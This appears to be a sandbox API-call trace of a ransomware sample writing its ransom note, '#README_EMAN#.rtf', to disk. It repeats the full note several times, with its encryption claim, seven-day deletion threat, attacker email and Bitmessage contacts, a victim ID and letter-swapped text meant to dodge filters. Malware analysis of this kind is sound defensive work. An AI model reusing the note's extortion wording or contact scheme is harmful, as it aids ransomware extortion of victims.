ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.677] WriteFile (in: hFile=0x2ec, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.678] CloseHandle (hObject=0x2ec) returned 1 [0298.678] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\#readme_eman#.rtf")) returned 0xffffffff [0298.678] GetLastError () returned 0x2 [0298.678] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m 